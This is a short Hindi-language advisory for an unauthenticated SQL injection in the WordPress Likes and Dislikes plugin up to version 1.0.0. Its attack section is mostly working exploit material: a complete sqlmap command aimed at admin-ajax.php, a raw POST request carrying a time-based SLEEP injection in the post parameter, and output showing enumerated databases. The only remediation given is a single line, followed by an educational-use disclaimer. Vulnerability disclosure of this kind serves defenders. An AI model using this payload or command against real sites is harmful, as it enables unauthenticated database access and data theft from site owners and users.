
WordPress Likes and Dislikes Plugin <= 1.0.0 SQL Injection के लिए असुरक्षित है
द्वारा खोजा गया: Khaled_Alenazi (Nxploited) प्रकाशित तिथि: 27 May, 2025
WordPress के लिए Likes and Dislikes Plugin सभी संस्करणों 1.0.0 तक में post पैरामीटर के माध्यम से SQL इंजेक्शन के लिए संवेदनशील है।
अपर्याप्त एस्केपिंग और प्रिपेयर्ड स्टेटमेंट्स की कमी के कारण, बिना प्रमाणीकरण के हमलावर बैकएंड क्वेरी में कच्चा SQL इंजेक्ट कर सकते हैं, जिससे डेटा रिसाव या हेरफेर हो सकता है।
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
यह कमांड इंजेक्शन पॉइंट की पुष्टि करता है और समय-आधारित तकनीक का उपयोग करके डेटाबेस की गणना करता है।
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
बूलियन-आधारित ब्लाइंड और समय-आधारित ब्लाइंड SQLi का पता लगाया।
- पुष्टि की गई कि बैकएंड MySQL है।
- गणना किए गए डेटाबेस: db, test, information_schema। 
15 सेकंड से अधिक हो गया, जो वास्तविक इंजेक्शन का संकेत है। 
post से इनपुट को सैनिटाइज़ और पैरामीटराइज़ करें।यह सामग्री केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान की गई है। लेखक स्पष्ट प्राधिकरण के बिना दुर्भावनापूर्ण गतिविधि या सिस्टम के शोषण का समर्थन नहीं करता है।
Khaled_Alenazi (Nxploited)